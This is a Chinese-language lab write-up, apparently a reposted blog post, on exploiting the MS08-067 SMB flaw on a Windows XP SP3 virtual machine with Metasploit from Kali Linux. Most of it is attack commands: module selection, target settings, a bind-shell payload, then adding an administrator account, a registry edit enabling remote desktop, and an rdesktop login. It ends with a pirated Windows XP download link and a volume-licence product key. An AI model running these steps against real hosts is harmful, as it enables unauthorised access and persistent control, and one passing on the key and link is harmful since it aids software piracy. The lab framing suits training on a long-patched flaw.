MS08-067利用

一、概述

利用Windows平台MS08-067漏洞,成功进行远程命令执行操作,并成功进行3389登录。
用到的端口:445、3389

二、实验环境(虚拟机搭建)

目标:windows xp professional sp3 英文版(中文版测试不成功)

攻击:Kali Linux

三、攻击过程

1.获取靶机和Kali Linux的IP地址
Windows:DOS窗口输入命令

ipconfig /all

查看Windows IP地址

Kali Linux:终端输入命令

ifconfig

查看Kali Linux IP地址
并且能相互ping

2.调用Kali Linux中msfconsole工具的ms08-067漏洞攻击模块
以下所有操作都是在Kali Linux的终端中完成
启动msfconsole工具

msfconsole

启动msfconsole工具

输入

search ms08-067

(查找漏洞攻击模块)

输入

use exploit/windows/smb/ms08_067_netapi

(使用该模块)
使用ms08-067攻击模块

3.配置options

set LHOST 172.16.165.137

set RHOST 172.16.165.135

set RPORT 445

设置options

show payloads

显示有效载荷

set payload generic/shell_bind_tcp



show options

开始攻击前检查配置

4.实施攻击

exploit

攻击成功

此时可以直接远程使用DOS命令对Windows进行操作

5.对Windwos进行远程连接

net user admin pass /add && net localgroup administrators admin /add

(在Windows上创建一个名称为admin密码为pass的用户,并提升为管理员权限)

echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

(开启windows远程登录端口)

netstat -an

(检查3389端口是否开启)

重新打开一个终端

rdesktop 172.16.165.135

进行远程登录

输入创建的用户名admin和密码pass回车 弹出提示框 点击OK 稍等就会成功远程登录

漏洞利用成功

四、用到的资源

Windows XP SP3 英文版下载地址:

ed2k://|file|en_windows_xp_professional_with_service_pack_3_x86_cd_vl_x14-73974.iso|617754624|7d1e7466df638674202dd8e7451c0b39|h=5JYEVQUSWB7WMCVM7JWGPNOIZFNTQXJY|

序列码:DP7CM-PD6MC-6BKXT-M8JJ6-RPXGJ

发布了27 篇原创文章 · 获赞 2 · 访问量 3920

猜你喜欢

转载自blog.csdn.net/s0mor/article/details/98937473
今日推荐